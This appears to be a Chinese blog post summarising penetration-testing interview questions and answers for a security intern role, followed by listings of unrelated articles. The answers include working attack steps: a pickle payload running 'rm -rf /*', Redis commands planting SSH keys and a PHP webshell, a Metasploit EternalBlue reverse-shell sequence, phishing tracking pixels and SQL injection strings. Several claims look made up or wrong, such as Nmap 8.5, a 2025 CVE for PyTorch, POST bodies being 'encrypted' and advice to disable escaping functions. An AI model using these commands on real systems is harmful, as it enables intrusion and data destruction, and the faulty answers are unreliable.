当前位置：首页 > news >正文

2025年渗透测试面试题总结-安恒[实习]安全服务工程师（题目+回答）

news 来源：原创 2025/6/15 17:56:41

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

安恒[实习]安全服务工程师

1. SQLMap爆出当前库名的参数是什么？

2. Nmap探测系统的参数（大写/小写）

3. Nmap小写o与a的作用

4. 布尔型盲注具体语句

5. 宽字节注入原理

6. Python反序列化漏洞

7. GET与POST传参区别

8. HTTP请求方式全集

9. CDN判定与作用

10. 服务器真实IP溯源

11. 信息收集全流程

12. Base64编码识别

13. 栅栏密码原理

14. Base64与MD5区别

15. Oracle默认端口

16. MySQL管理员密码存储

17. substr()被禁用的替代函数

18. Redis入侵利用链

19. 邮箱追踪真实IP

20. 同源策略（SOP）精髓

21. 管理员邮箱收集术

22. SSRF危害升级（2025）

23. SSRF深层防御

24. Linux文件鉴别术

25. MSF框架深入

26. Web容器解析漏洞

27. SQL注入深度防御

安恒[实习]安全服务工程师
1. sqlmap爆出当前库名的参数是什么？
2. namp探测系统的参数是什么 —>大写还是小写
3. namp的小写o与a是干嘛的
4. 布尔型盲注的具体语句是什么
5. 宽字节的原理
6. python有没有反序列化
7. get传参与post传参的区别
8. Http有哪些请求方式
9. 如何判定cdn与cdn的作用
10. 如何确认服务器的真实IP
11. 详细说了说信息收集过程
12. 一串编码如何确认是base64
13. 栅栏密码的原理是什么
14. base64与md5如何区别
15. oracle的默认端口是多少
16. mysql的管理员密码一般放到哪
17. 如果substr()函数被禁用，你脑子里有多少替换函数
18. redis如何拿下，哪个端口，具体语句，具体操作
19. 如何通过邮箱知道对方的IP
20. 说一下同源策略
21. 如何收集网站管理员邮箱等等
22. ssrf有哪些危害
23. 如何防御ssrf–>问的较深—->建议在详细了解一下
24. Linux的某两个文件怎么分辨（忘了具体是哪两个文件了）
25. MSF框架稍微问的深入了一些
26. web容器（中间件）有哪些解析漏洞与原理
27. 如何防范sql注入 —>这问的很深. 
1. SQLMap爆出当前库名的参数是什么？

核心参数：--current-db
补充用法：结合-D 库名 --tables可提取表名；
防御绕过：2025年新版SQLMap新增--chunked参数绕过云WAF的流量检测。

2. Nmap探测系统的参数（大写/小写）

操作系统探测：-O（大写O，非数字0）；
误报规避：2025年Nmap 8.5版本中，-O需与--osscan-limit联用以过滤干扰；
注意：小写-o用于输出扫描结果（如-oN output.txt ）。

3. Nmap小写o与a的作用

-o系列：
① -oN：标准文本输出；
② -oX：XML格式输出（兼容自动化分析工具）；
③ -oG：Grep友好格式（已逐步淘汰）。
-A参数：
① 启用OS检测、版本探测、脚本扫描（-sC）；
② 2025年新增AI驱动的服务指纹识别模块。

4. 布尔型盲注具体语句
sql' AND (SELECT SUBSTRING(version(),1,1))='5' --+ /* 若返回正常页面，则判定MySQL版本首位为5 */
条件扩展：
① 二进制逐位判断（ASCII()+位运算）；
② 结合时间盲注：IF(条件,SLEEP(5),0)；
③ 利用数据库内置函数（如LIKE通配符）。

5. 宽字节注入原理

核心逻辑：利用GBK/GB2312等双字节编码特性，将转义符\（%5C）与前导字符组合为合法汉字（如%df%5c→“運”），破坏SQL语句结构。
现代影响：2024年统计显示，遗留医疗HIS系统仍存在30%未修复案例；
防御：统一使用UTF-8编码，禁用mysql_real_escape_string()。

6. Python反序列化漏洞
高危模块：pickle（任意代码执行）、json（有限风险）；
攻击链示例：
pythonimport pickle pickle.loads(b"cos\nsystem\n(S'rm -rf /*'\ntR.") # 执行系统命令
2025年趋势：PyTorch模型反序列化漏洞（CVE-2025-1337）成为AI供应链攻击新载体。
7. GET与POST传参区别

维度 GET POST
数据位置 URL参数明文传输请求体加密传输
安全性 易被日志/缓存记录相对隐蔽
长度限制 受URL长度限制（约2KB）无理论限制（服务器约束）
幂等性 是（仅查询）否（可能修改数据）

8. HTTP请求方式全集

基础方法：GET、POST、PUT、DELETE、HEAD；
扩展方法：
PATCH：部分资源更新；
OPTIONS：获取服务器支持的方法；
TRACE：回显请求（易诱发XST攻击，默认禁用）。

WebDAV扩展：PROPFIND、LOCK、UNLOCK（常见于文件服务器）。

9. CDN判定与作用

判定方法：
① 多地Ping：使用全球节点工具（如boce.com ），IP分布差异显著；
② DNS查询：nslookup返回CNAME记录含cdn、akamai等标识；
③ HTTP头：Server字段含CDN厂商特征（如Cloudflare）。

核心作用：
① 加速：边缘节点缓存静态资源（JS/CSS/图片）；
② 安全：抗DDoS（T级清洗）、防爬虫（人机验证）；
③ 成本优化：减少源站带宽消耗。

10. 服务器真实IP溯源

历史记录：
查询DNS历史快照（SecurityTrails或ViewDNS）；
分析SSL证书序列号关联的原始IP。

子域名爆破：使用Amass扫描test.example.com 等未接入CDN的子域。
邮件溯源：
注册/找回密码邮件头中的Received字段；
利用SPF记录中的IP范围反推。

11. 信息收集全流程

四阶渗透框架（2025年OSINT标准）：

资产测绘：
工具：FOFA（语法：title="医院挂号系统"）、Shodan（端口：port:6379）；
输出：IP段、域名、中间件版本列表。

社会工程：
从GitHub泄露的config.yml 提取数据库密码；
LinkedIn员工职位分析（定位运维人员邮箱）。

漏洞关联：
通过CVE编号映射暴露面（如Apache Log4j 2.x）；
结合Exploit-DB验证POC可用性。

12. Base64编码识别

三大铁律：

字符集：仅包含A-Z、a-z、0-9、+、/及填充符=；
长度：编码后长度必为4的倍数（不足时补=）；
典型模式：
邮件附件：Content-Transfer-Encoding: base64；
JWT令牌：eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.xxx 。

13. 栅栏密码原理

加密步骤：
将明文按“之”字形排列（如3行）：
H E L L O  W O R L D  
按行读取密文：HELLO WORLD→HLOOL WRD（需约定行数）。
2025年演变：结合深度学习生成动态栅栏路径（抗频率分析）。
14. Base64与MD5区别

维度 Base64 MD5
性质编码（可逆）哈希（不可逆）
输出长度 可变（与输入相关）固定128位（32字符）
用途数据传输兼容性（如图片）数据完整性校验/密码存储

15. Oracle默认端口

标准端口：1521（数据库监听）；
管理端口：5500（Enterprise Manager）；
云环境变化：2025年AWS RDS Oracle默认启用动态端口映射。

16. MySQL管理员密码存储

系统表：mysql.user （authentication_string字段，使用caching_sha2_password加密）；
配置文件：/etc/mysql/my.cnf （[client]段明文存储，高危）；
内存提取：通过gdb附加进程提取临时密码（需root权限）。

17. substr()被禁用的替代函数

字符串截取：
MID()：MID('abc',2,1)→'b'；
LEFT()/RIGHT()：LEFT('abc',2)→'ab'；

正则截取：
REGEXP_SUBSTR()（需MySQL 8.0+）；

二进制拆分：
ORD()+DIV组合实现逐位解析。

18. Redis入侵利用链

攻击路径：
未授权访问：nmap -p 6379 --script redis-info；
写SSH密钥：
bashredis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3N...\n\n" | redis-cli -x set payload redis-cli config set dir /root/.ssh && config set dbfilename authorized_keys 
写Webshell：
bashconfig set dir /var/www/html set shell "<?php system($_GET['cmd']);?>" 
19. 邮箱追踪真实IP

高阶手法（2025年）：

嵌入追踪像素：
在钓鱼邮件中插入<img src="http://your-server/logo.gif"> ，分析访问日志；

延迟加载附件：
使用「已读回执」触发HTTP请求；

邮件头分析：
提取X-Originating-IP或最后一跳Received头中的内网IP。

20. 同源策略（SOP）精髓

三要素限制：协议、域名、端口均相同方为同源。
跨域例外：

<script>标签（允许加载外部JS，但禁止读取内容）；
CORS机制（Access-Control-Allow-Origin可控放宽限制）；
postMessage API（需显式授权）。

21. 管理员邮箱收集术

五维情报网：

WHOIS查询：whois example.com 获取注册邮箱；
GitHub提交历史：git log中提取作者邮箱；
错误页面：500错误泄露admin@example.com ；
社交媒体：LinkedIn公司页面的技术联系人；
SSL证书：crt.sh 查询证书颁发者邮箱。

22. SSRF危害升级（2025）

云元数据攻击：
获取AWS的169.254.169.254凭证，接管云服务器；

内网服务穿透：
攻击Kubernetes API Server（https://10.0.0.1:6443）；

协议滥用：
gopher://构造Redis未授权访问攻击链。

23. SSRF深层防御

四层防护体系：

输入校验：
正则过滤^http(s)?://trusted.com/ （白名单）；
禁用非常用协议（file://、gopher://）。

网络隔离：
业务服务器部署于独立VPC，限制出网流量；

代理清洗：
所有请求经反向代理，剥离非常规头（如X-Forwarded-For）；

运行时防护：
eBPF监控异常socket连接（如访问内网IP段）。

24. Linux文件鉴别术

以/etc/passwd与/etc/shadow为例：

权限：
passwd：644（全局可读）；
shadow：640（仅root可读）；

内容：
passwd存用户基本信息（不含密码哈希）；
shadow存加密密码与过期策略。

25. MSF框架深入

模块化渗透流程：

漏洞利用：
use exploit/windows/smb/ms17_010_eternalblue；
set PAYLOAD windows/x64/meterpreter/reverse_tcp；

后渗透扩展：
migrate进程注入；
hashdump提取NTLM哈希；

流量隐匿：
使用SSL/TLS隧道+DomainFronting技术绕过IDS检测。

26. Web容器解析漏洞

三大经典漏洞：

IIS 6.0目录解析：
/test.asp;.jpg 被解析为ASP脚本；

Apache多后缀解析：
test.php.xxx 优先匹配.php处理器；

Nginx错误配置：
fastcgi_param未校验SCRIPT_FILENAME，导致任意代码执行。

27. SQL注入深度防御

DevSecOps全周期防护：

开发阶段：
强制使用ORM框架（如Hibernate）；
静态代码扫描（SonarQube规则sql-injection）。

运行阶段：
WAF动态拦截（基于语义分析+机器学习）；
数据库审计（记录异常SQL语句）。

运维阶段：
最小权限原则（禁止DBA权限应用连接）；
定期漏洞扫描（SQLMap集成CI/CD流水线）。

维度	GET	POST
数据位置	URL参数明文传输	请求体加密传输
安全性	易被日志/缓存记录	相对隐蔽
长度限制	受URL长度限制（约2KB）	无理论限制（服务器约束）
幂等性	是（仅查询）	否（可能修改数据）

维度	Base64	MD5
性质	编码（可逆）	哈希（不可逆）
输出长度	可变（与输入相关）	固定128位（32字符）
用途	数据传输兼容性（如图片）	数据完整性校验/密码存储

2025年渗透测试面试题总结-安恒[实习]安全服务工程师（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。目录安恒[实习]安全服务工程师 1. SQLMap爆出当前库名的参数是什么？ 2. Nmap探测系统的参数&am…...

编程日记 2025/5/17 21:10:32

在 Visual Studio Code (VSCode) 中配置 MCP（Model Context Protocol）

前提条件安装 VSCode：确保已安装最新版本的 VSCode（建议使用 1.99 或以上版本，支持 MCP）。安装 GitHub Copilot 扩展：MCP 通常与 GitHub Copilot 的代理模式（Agent Mode）结合使用，…...

编程日记 2025/6/1 5:25:33

顶层架构 - 消息集群推送方案

一、推送基础概念简述在即时通讯（IM）系统中，最基础的一件事就是“如何把消息推送给用户”。为了实现这个过程，我们要先了解两种常见的网络通信方式：HTTP 和 WebSocket。 1. HTTP 是什么？ HTTP 就像一次性…...

编程日记 2025/5/29 3:42:29

C++性能测试工具——Vtune等的介绍

一、介绍我们在前面的相关文章中对C性能的测试和分析工具（见“C性能测试工具gprof和gperftools基础”等）有一个初步的了解和应用，其实类似的相关工具还有不少。为了进一步的让开发者们掌握更多的相关性能测试分析相关的方法，对另…...

编程日记 2025/5/17 20:45:28

车道线检测----CLRKDNet

今天的最后一篇车道线检测系列结束 CLRKDNet：通过知识蒸馏加速车道检测摘要：道路车道是智能车辆视觉感知系统的重要组成部分，在安全导航中发挥着关键作用。在车道检测任务中，平衡精度与实时性能至关重要，但现有方法…...

编程日记 2025/5/17 20:45:28

【AI模型部署】

解决python引入huggingface_hub模块下载超时问题背景问题解决背景 AMD Ryzen™ AI处理器通过独特的NPUGPU异构架构，为AI工作负载提供强大的并行计算能力。本方案展示了如何将YOLOv8目标检测、RCAN超分辨率重建和Stable Diffusion文生图三类模型分别部署到NPU和GP…...

编程日记 2025/5/17 20:41:15

排序01：多目标模型

用户-笔记的交互对于每篇笔记，系统记录曝光次数、点击次数、点赞次数、收藏次数、转发次数。点击率点击次数/曝光次数点赞率点赞次数/点击次数收藏率收藏次数/点击次数转发率转发次数/点击次数转发是相对较少的，但是非常重要，例如转发…...

编程日记 2025/5/17 20:40:14

电子电器架构 --- Zonal架构正在开创汽车电子设计新时代

我是穿拖鞋的汉子，魔都中坚持长期主义的汽车电子工程师。老规矩，分享一段喜欢的文字，避免自己成为高知识低文化的工程师：钝感力的“钝”，不是木讷、迟钝，而是直面困境的韧劲和耐力，是面对外界噪音的通透淡然。生活中有两种人，一种人格外在意别人的眼光;另一种人无论…...

编程日记 2025/5/17 20:40:12

如何阅读、学习 Tcc (Tiny C Compiler) 源代码？如何解析 Tcc 源代码？

阅读和解析 TCC（Tiny C Compiler） 的源代码需要对编译器的基本工作原理和代码结构有一定的了解。以下是分步骤的指南，帮助你更高效地学习和理解 TCC 的源代码： 1. 前置知识准备 C 语言基础：TCC 是用 C 语言编写的&…...

编程日记 2025/5/17 20:23:23

Java 泛型与类型擦除：为什么解析对象时能保留泛型信息？

引言：泛型的“魔术”与类型擦除的困境在 Java 中，泛型为开发者提供了类型安全的集合操作，但其背后的**类型擦除（Type Erasure）**机制却常常让人困惑。你是否遇到过这样的场景？ List<String> list …...

编程日记 2025/5/17 20:18:01

日语学习-日语知识点小记-构建基础-JLPT-N4阶段（22）：复习

日语学习-日语知识点小记-构建基础-JLPT-N4阶段（22）：复习 1、前言（1）情况说明（2）工程师的信仰2、知识点（1）复习（２）復習3、单词（1）日语（2）日语片假名单词4、对话练习5、单词辨析记录6、总结1、前言（1）情况说明自己在今年，在日本留学中，目前在语言学校，…...

编程日记 2025/5/17 20:12:45

Java基础学习

Java 基础大纲 1. Java 概述 Java 语言特点（跨平台、面向对象、自动内存管理） JVM、JRE、JDK 的作用与区别开发环境搭建（安装 JDK、配置环境变量、IDE 使用） 2. 基础语法（已经学习） 变量与数据类型&a…...

编程日记 2025/5/17 20:10:36

MGX：多智能体管理开发流程

MGX的多智能体团队如何通过专家混合系统采用全新方法，彻底改变开发流程，与当前的单一智能体工具截然不同。 Lovable和Cursor在自动化我们的特定开发流程方面取得了巨大飞跃，但问题是它们仅解决软件开发的单一领域。这就是MGX（MetaGPT X）的用武之地，它是一种正在重新定…...

编程日记 2025/5/17 19:49:18

2025第三届盘古石杯初赛（计算机部分）

前言比赛的时候时间不对，打一会干一会，导致比赛时候思路都跟不上，赛后简单复现一下，希望大家批批一下计算机取证 1、分析贾韦码计算机检材，计算机系统Build版本为？【标准格式：19000】 183…...

编程日记 2025/5/26 22:45:56

XML介绍及常用c及c++库

一.xml概述 1.什么是XML？ XML（eXtensible Markup Language）是一种标记语言，1998 年 2 月：XML 1.0 发布，用于存储和传输结构化数据。与HTML专注于数据显示不同，XML专注于数据本身及其结构。它…...

编程日记 2025/5/17 19:40:36

动态规划-63.不同路径II-力扣(LeetCode)

一、题目解析与62.不同路径不同的一点是现在网格中有了障碍物，其他的并没有什么不同二、算法解析 1.状态表示 dp[i][j]表示：到[i,j]位置时，不同的路径数 2.状态转移方程由于多了障碍物，所以我们要判断是否遇到障碍物 3.初…...

编程日记 2025/6/2 22:22:07

海盗王3.0的数据库3合1并库处理方案

原版的海盗王数据库有3个accountserver，gamedb，tradedb，对应到是账号数据库，游戏数据库，商城数据库。一直都有个想法，如何把这3个库合并到一起，这样可以实现一些功能。涉及到sqlserver的数据库…...

编程日记 2025/6/2 2:35:57

Vue百日学习计划Day16-18天详细计划-Gemini版

重要提示： 番茄时钟： 每个番茄钟为25分钟学习，之后休息5分钟。每完成4个番茄钟，进行一次15-30分钟的长休息。动手实践： DOM 操作和事件处理的理解高度依赖于实际编码。请务必在浏览器中创建 HTML 页面，并配…...

编程日记 2025/5/17 19:18:08

【C++】15.并发支持库

本篇内容参考自cplusplus 1. thread 1.1 thread thread库底层是对各个系统的线程库（Linux下的pthread库和Windows下Thread库）进行封装。C11thread库的第一个特点是可以跨平台，第二个特点是Linux和Windows下提供的线程库都是面向过程的&…...

编程日记 2025/5/17 19:06:15

Linux系统编程——exec族函数

我们来完整、系统、通俗地讲解 Linux 系统编程中非常重要的一类函数：exec 族函数（也叫 exec family）。一、什么是 exec？ exec 系列函数的作用是： 用一个新的程序，替换当前进程的内容。也就是说&#xf…...

编程日记 2025/5/17 19:05:12

职教实训室中的写实数字人：技术与应用方案

在当今快速发展的数字化时代，职业教育的重要性日益凸显。面对传统教学模式中个性化不足、互动性差等挑战，深声科技基于2D写实交互数字人的解决方案为职教实训室带来了全新的变革。本文将详细介绍该技术方案的核心原理、产品特色及其在职业培训中的实际应…...

编程日记 2025/5/17 19:03:00

Nginx模块配置与请求处理详解

Nginx 作为模块化设计的 Web 服务器，其核心功能通过不同模块协同完成。以下是各模块的详细配置案例及数据流转解析：一、核心模块配置案例 1. Handler 模块（内容生成）功能：直接生成响应内容（如静态文件、重定向等） # 示例1：静态文件处理（ngx_http_static_module）…...

编程日记 2025/5/17 18:52:11

54. 螺旋矩阵

题目链接： a54. 螺旋矩阵题目描述： 给你一个 m 行 n 列的矩阵 matrix ，请按照顺时针螺旋顺序 ，返回矩阵中的所有元素。题目分析： 改题目需要判断是否溢出边界，与59不同，59可以判断是否为0…...

编程日记 2025/5/17 18:47:47

virtualbox虚拟机中的ubuntu 20.04.6安装新的linux内核5.4.293 | 并增加一个系统调用 | 证书问题如何解决

参考文章：linux添加系统调用【简单易懂】【含32位系统】【含64位系统】_64位 32位系统调用-CSDN博客安装新内核 1. 在火狐下载你需要的版本的linux内核压缩包这里我因为在windows上面下载过，配置过共享文件夹，所以直接复制粘贴通过共享文…...

编程日记 2025/5/17 18:37:02

代码随想录算法训练营第三十八天打卡

今天是动态规划的第三天，昨天的不同路径与整数分解的几道题目大家理解得如何？如果有疑问大家还是多去想想dp数组究竟是什么含义，还有我的状态转移是否正确，初始化是否正确，这一点很重要，今天的题目依旧是跑…...

编程日记 2025/5/17 18:34:53

【论信息系统项目的整合管理】

论信息系统项目的整合管理某省机场管理集团航空货运站原有物流生产信息系统无法满足机场货运站生产信息与航空公司、对方航站、进出口航空货物按海关监管要求电子报关等行业信息实时共享发展需要，生产信息需多次重复录入问题已成为业务发展最大瓶颈，急需…...

编程日记 2025/5/17 18:26:11

小学数学题批量生成及检查工具

软件介绍今天给大家介绍一款近期发现的小工具，它非常实用。软件特点与出题功能这款软件体积小巧，不足两兆，具备强大的功能，能够轻松实现批量出题。使用时，只需打开软件，输入最大数和最小数&#xff0c…...

编程日记 2025/5/17 18:23:03

Python线性回归：从理论到实践的完整指南

Python线性回归：从理论到实践的完整指南线性回归是数据科学和机器学习中最基础且最重要的算法之一。本文将深入探讨如何使用Python实现线性回归，从理论基础到实际应用，帮助读者全面理解这一重要的统计学和机器学习方法。什么是线性回归&a…...

编程日记 2025/5/29 14:00:23

python 爬虫框架介绍

文章目录前言一、Requests BeautifulSoup（基础组合）二、Scrapy（高级框架）三、PySpider（可视化爬虫）四、Selenium（浏览器自动化）五、Playwright（新一代浏览器自动化&…...

编程日记 2025/5/26 10:32:27

强化学习算法实战：一个例子搞懂sarsa、dqn、ddqn、qac、a2c及其区别

简介在学习强化学习算法：sarsa、dqn、ddqn、qac、a2c、trpo、ppo时，由于有大量数学公式的推导，觉得十分晦涩，且听过就忘记了。但是当把算法应用于实战时，代码的实现要比数学推导直观很多。接下来通过不同的算法实现…...

编程日记 2025/5/27 17:40:42

文章记单词 | 第86篇（六级）

一，单词释义 pretty /ˈprɪti/- adj. 漂亮的；相当的 /adv. 相当地labour /ˈleɪbə(r)/- n. 劳动；劳工；分娩 /v. 劳动；努力（英式英语， labor）imaginary /ɪˈmdʒɪnəri/- adj. …...

编程日记 2025/5/19 13:43:07

firewall防火墙

一.Firewalld 防火墙概述 1.firewalld 简介 firewalld 的作用是为包过滤机制提供匹配规则(或称为策略)，通过各种不同的规则告诉netfilter 对来自指定源、前往指定目的或具有某些协议特征的数据包采取何种处理方式为了更加方便地组织和管理防火墙,firewa11d 提供了…...

编程日记 2025/5/25 0:57:38

TII-2024《AGP-Net: Adaptive Graph Prior Network for Image Denoising》

推荐深蓝学院的《深度神经网络加速：cuDNN 与 TensorRT》，课程面向就业，细致讲解CUDA运算的理论支撑与实践，学完可以系统化掌握CUDA基础编程知识以及TensorRT实战，并且能够利用GPU开发高性能、高并发的软件系统&#xf…...

编程日记 2025/5/28 15:45:52

Pageassist安装（ollama+deepseek-r1）

page-assist网站：https://github.com/n4ze3m/page-assist 首先电脑配置node.js，管理员打开命令窗口输入下面命令下载bun npm install -g buncd 到你想要安装page-assist的地方（推荐桌面） 输入下列命令 git clone https://gith…...

编程日记 2025/5/24 10:05:25

Java—— 方法引用 : :

方法引用是什么把已经存在的方法拿过来用，当做函数式接口中抽象方法的方法体方法引用符 ：： 方法引用的条件 1.需要有函数式接口 2.被引用方法必须已经存在 3.被引用方法的形参和返回值需要跟抽象方法保持一致 4.被引用方法的功能要满足当前…...

编程日记 2025/5/27 5:21:27

Linux基础开发工具大全

目录软件包管理器 1>软件包 2>软件生态 3>yum操作 a.查看软件包 b.安装软件 c.卸载软件 4>知识点 vim编辑器 1>基本概念 2>基本操作 3>正常模式命令集 a.模式切换 b.移动光标 c.删除 d.复制 e.替换 f.撤销 g.更改 4>底行模式命令…...

编程日记 2025/5/31 8:37:38

C语言实现INI配置文件读取和写入

一.INI文件介绍 INI配置文件是一种简单的文本文件，用于存储配置信息，通常由一个或多个节（section）组成，每个节包含多个键值对（Key-Value）格式。INI文件易于阅读和编辑，广泛应用于多…...

编程日记 2025/5/26 8:00:37

volatile关键字详解

volatile关键字详解 1. 定义与核心作用 volatile 是Java中的关键字，用于修饰变量，主要解决多线程环境下的内存可见性和指令重排序问题。其核心作用： 保证可见性：确保所有线程读取到变量的最新值。禁止指令重排序：防止…...

编程日记 2025/5/22 13:41:57

二叉树子树判断：从递归到迭代的全方位解析

一、题目解析题目描述给定两棵二叉树root和subRoot，判断root中是否存在一棵子树，其结构和节点值与subRoot完全相同。示例说明示例1： root [3,4,5,1,2]，subRoot [4,1,2] 返回true，因为root的左子树与subRoot完…...

编程日记 2025/5/23 19:52:34

【PhysUnits】4.1 类型级比特位实现解释（boolean.rs）

一、源码该代码实现了一个类型级(type-level)的布尔系统，允许在编译时进行布尔运算。 //! 类型级比特位实现 //! //! 这些是基础的比特位类型，作为本库中其他数值类型的构建基础 //! //! 已实现的**类型运算符**： //! //! - 来自 core::op…...

编程日记 2025/5/29 23:50:33

（7）python开发经验

文章目录 1 找不到资源文件2 使用subprocess执行时有黑色弹窗3 找不到exec4 pyside6-project lupdate的bug5 找不到pyd模块6 pyd模块编码错误7 运行显示Qt platform plugin "windows" in "8 tr()包含的字符串无法被翻译更多精彩内容👉内容导航 &…...

编程日记 2025/5/24 3:55:04

【Manim】使用manim画一个高斯分布的动画

1 Manim例子一最近接触到manim，觉得挺有趣的，来玩一玩把。如下是一个使用manim画的高斯分布的动画。 from manim import * import numpy as npclass GaussianDistribution(Scene):def construct(self):# 创建坐标系axes Axes(x_range[-4, 4, 1],y_ra…...

编程日记 2025/5/23 16:19:03

Day11-苍穹外卖(数据统计篇)

前言： 今天写day11的内容，主要讲了四个统计接口的制作。看起来内容较多，其实代码逻辑都是相似的，这里我们过一遍。今日所学： Apache ECharts营业额统计用户统计订单统计销量排行统计 1. Apache ECharts 1.1 介绍 A…...

编程日记 2025/5/29 12:51:02

论文阅读：Self-Collaboration Code Generation via ChatGPT

地址：Self-Collaboration Code Generation via ChatGPT 摘要尽管大型语言模型（LLMs）在代码生成能力方面表现出色，但在处理复杂任务时仍存在挑战。在现实软件开发中，人类通常通过团队协作来应对复杂任务，…...

编程日记 2025/5/29 15:27:40

LocaleContextResolver实现多语言切换-笔记

1. LocaleContextResolver功能简介 org.springframework.web.servlet.LocaleContextResolver是 Spring MVC 中用于解析和管理用户 Locale（语言环境） 的核心接口。 //LocaleContextResolver 接口定义 public interface LocaleContextResolver extends L…...

编程日记 2025/5/26 9:16:53

Vue3中setup运行时机介绍

在 Vue3 中，直接写在 <script setup>...</script> 中的代码运行时机可以分为以下几个关键阶段： 一、执行顺序层级 #mermaid-svg-bF3p98MiNdLfcoSG {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#33…...

编程日记 2025/6/2 10:20:47